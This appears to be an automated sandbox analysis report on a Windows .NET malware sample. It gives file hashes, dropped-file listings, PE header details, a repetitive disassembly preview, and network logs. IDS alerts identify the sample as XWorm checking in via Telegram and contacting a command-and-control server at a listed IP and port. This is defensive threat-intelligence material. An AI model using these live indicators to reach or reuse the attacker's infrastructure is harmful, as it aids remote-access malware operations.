                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.379540626579189
                                                            Encrypted:false
                                                            SSDEEP:48:BWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YUyus:BLHxvIIwLgZ2KRHWLOug8s
                                                            MD5:E69342C07081A0B5758E395CA798BE5D
                                                            SHA1:CE601F56F96A76C622AB2C000255A628B2C57E5B
                                                            SHA-256:5EDB0DFF728B1BF3A650145974EEF9CEB2C89EBF15146481496FA18636608FA8
                                                            SHA-512:CD0C5723F3CE7028401AA486713349711F64611BECDFA20E080DC83D0227A615F070DD014CAF95F8F524C507116B8519FE4287B727F9724B947F9DB42F91E45A
                                                            Malicious:false
                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gxfn111.dfi.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_coqbk5j1.kuj.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqvi3wjx.qt2.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnojatvs.u4o.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.421885086782537
                                                            Encrypted:false
                                                            SSDEEP:6144:iSvfpi6ceLP/9skLmb0OTFWSPHaJG8nAgeMZMMhA2fX4WABlEnNm0uhiTw:xvloTFW+EZMM6DFyQ03w
                                                            MD5:40182805E30594C1A47A833101A7F18E
                                                            SHA1:9771FB84B5BE19A3FE458A469208A4C39494C56E
                                                            SHA-256:8BD735356C7E35A30ED2206635E9C8516FE8CA6D669DDFFE203BBADE4D24D76B
                                                            SHA-512:77C97BDF0344D4F7266570A469C163340681EBFA78D8535FDD4F47C108D71D2AFF8C803101047B133E74BCC08CC3B603A147AB6F012871157CFB1CD9EFC9CD2A
                                                            Malicious:false
                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....-...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.724397078887104
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                                                            File size:434'176 bytes
                                                            MD5:a4cd1ff60c7b69df5a061df3365e60c7
                                                            SHA1:e85cd869046c923938c1268c5eed9d30f0f94668
                                                            SHA256:657b68666c2b79d65d51a403dd7fa0e35b1109156290efd69a681777eb6e4107
                                                            SHA512:b6605cefd430df2b89fe7e48bc42fd8930bfd73d1586cb60e1cd0f42934977e4c051b8cbb45221c422b018156302552fbb8d004ee383ba997ea8987b4906bdce
                                                            SSDEEP:6144:3dLggcpnE0XhbB2XmCCXF1eHkfhl3USgyIPoJdrN+NZF0EDt2AvPTe8bQb:3dggiXJkw18uhJTeOdR+5hQAvC8bQb
                                                            TLSH:7394F1A42656D916C0D20BB50D32E2F867B64DCCE812C30BEBDA7EEF7C3A7552846351
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u{...............0.............f.... ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x46b566
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0xBE7B7599 [Wed Apr 8 23:41:13 2071 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6b5120x4f.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x5a4.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x6a3b40x70.text
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x6956c0x6960052bcb8c72601aace651d4026653a56f9False0.912700177935943data7.7368081138603095IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x6c0000x5a40x6002ce99079c5318b9fb08ea1f5e910ab6cFalse0.419921875data4.086638062125505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x6e0000xc0x200db501a188f47149e6fca9ea8d5448160False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x6c0900x314data0.434010152284264
                                                            RT_MANIFEST0x6c3b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-09-25T11:31:08.995831+02002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.549708149.154.167.220443TCP
                                                            2024-09-25T11:32:23.446645+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.549734147.185.221.2255202TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 25, 2024 11:31:07.775232077 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:07.775285006 CEST44349708149.154.167.220192.168.2.5
                                                            Sep 25, 2024 11:31:07.775367022 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:07.781055927 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:07.781079054 CEST44349708149.154.167.220192.168.2.5
                                                            Sep 25, 2024 11:31:08.406729937 CEST44349708149.154.167.220192.168.2.5
                                                            Sep 25, 2024 11:31:08.406855106 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:08.414784908 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:08.414798975 CEST44349708149.154.167.220192.168.2.5
                                                            Sep 25, 2024 11:31:08.415205002 CEST44349708149.154.167.220192.168.2.5
                                                            Sep 25, 2024 11:31:08.458451033 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:08.485009909 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:08.531400919 CEST44349708149.154.167.220192.168.2.5
                                                            Sep 25, 2024 11:31:08.995898008 CEST44349708149.154.167.220192.168.2.5
                                                            Sep 25, 2024 11:31:08.995984077 CEST44349708149.154.167.220192.168.2.5
                                                            Sep 25, 2024 11:31:08.996049881 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:09.002259970 CEST49708443192.168.2.5149.154.167.220
                                                            Sep 25, 2024 11:31:09.157423019 CEST4971055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:09.162383080 CEST5520249710147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:09.162540913 CEST4971055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:09.195919037 CEST4971055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:09.200809002 CEST5520249710147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:11.817769051 CEST5520249710147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:11.821160078 CEST4971055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:13.771183968 CEST4971055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:13.773112059 CEST4971255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:13.776186943 CEST5520249710147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:13.777916908 CEST5520249712147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:13.778131962 CEST4971255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:13.800976038 CEST4971255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:13.809524059 CEST5520249712147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:16.757965088 CEST5520249712147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:16.758147001 CEST4971255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:17.068016052 CEST4971255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:17.069550991 CEST4971355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:17.073079109 CEST5520249712147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:17.074459076 CEST5520249713147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:17.074553013 CEST4971355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:17.116945028 CEST4971355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:17.122033119 CEST5520249713147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:19.769987106 CEST5520249713147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:19.770061016 CEST4971355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:22.177453041 CEST4971355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:22.181372881 CEST4971755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:22.182396889 CEST5520249713147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:22.186172009 CEST5520249717147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:22.188815117 CEST4971755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:22.217221975 CEST4971755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:22.224616051 CEST5520249717147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:24.928502083 CEST5520249717147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:24.929188967 CEST4971755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:25.833547115 CEST4971755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:25.834891081 CEST4971855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:25.839025974 CEST5520249717147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:25.839730978 CEST5520249718147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:25.839802027 CEST4971855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:25.859332085 CEST4971855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:25.864151955 CEST5520249718147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:28.491193056 CEST5520249718147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:28.491384029 CEST4971855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:28.567954063 CEST4971855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:28.569722891 CEST4971955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:28.573220968 CEST5520249718147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:28.574698925 CEST5520249719147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:28.574790955 CEST4971955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:28.597140074 CEST4971955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:28.601979017 CEST5520249719147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:31.240084887 CEST5520249719147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:31.240318060 CEST4971955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:33.083745956 CEST4971955202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:33.085140944 CEST4972055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:33.344516993 CEST5520249719147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:33.344559908 CEST5520249720147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:33.344647884 CEST4972055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:33.364641905 CEST4972055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:33.369535923 CEST5520249720147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:36.004740000 CEST5520249720147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:36.004821062 CEST4972055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:37.817946911 CEST4972055202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:37.819233894 CEST4972155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:37.822921991 CEST5520249720147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:37.824018955 CEST5520249721147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:37.824177027 CEST4972155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:37.841557980 CEST4972155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:37.846381903 CEST5520249721147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:40.474981070 CEST5520249721147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:40.475332022 CEST4972155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:42.880583048 CEST4972155202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:42.882345915 CEST4972255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:42.885500908 CEST5520249721147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:42.887151003 CEST5520249722147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:42.887227058 CEST4972255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:42.905838966 CEST4972255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:42.910651922 CEST5520249722147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:45.539747000 CEST5520249722147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:45.541224003 CEST4972255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:46.177515984 CEST4972255202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:46.179519892 CEST4972355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:46.182442904 CEST5520249722147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:46.184530020 CEST5520249723147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:46.184598923 CEST4972355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:46.205467939 CEST4972355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:46.212189913 CEST5520249723147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:48.859380007 CEST5520249723147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:48.859591961 CEST4972355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:50.349308968 CEST4972355202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:50.351699114 CEST4972455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:50.354953051 CEST5520249723147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:50.357640028 CEST5520249724147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:50.357738018 CEST4972455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:50.384630919 CEST4972455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:50.394099951 CEST5520249724147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:53.002875090 CEST5520249724147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:53.002966881 CEST4972455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:54.943957090 CEST4972455202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:54.946036100 CEST4972555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:54.948832035 CEST5520249724147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:54.950896025 CEST5520249725147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:54.951005936 CEST4972555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:54.970515966 CEST4972555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:54.975339890 CEST5520249725147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:57.670661926 CEST5520249725147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:57.670756102 CEST4972555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:59.567943096 CEST4972555202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:59.569350004 CEST4972755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:59.573237896 CEST5520249725147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:59.574476957 CEST5520249727147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:31:59.574552059 CEST4972755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:59.591393948 CEST4972755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:31:59.596272945 CEST5520249727147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:02.273792982 CEST5520249727147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:02.273920059 CEST4972755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:02.786676884 CEST4972755202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:02.787914991 CEST4972855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:02.791584015 CEST5520249727147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:02.792701006 CEST5520249728147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:02.792792082 CEST4972855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:02.809473991 CEST4972855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:02.814224958 CEST5520249728147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:05.720949888 CEST5520249728147.185.221.22192.168.2.5
                                                            Sep 25, 2024 11:32:05.721168995 CEST4972855202192.168.2.5147.185.221.22
                                                            Sep 25, 2024 11:32:05.721333027 CEST5520249728147.185.221.22192.168.2.5
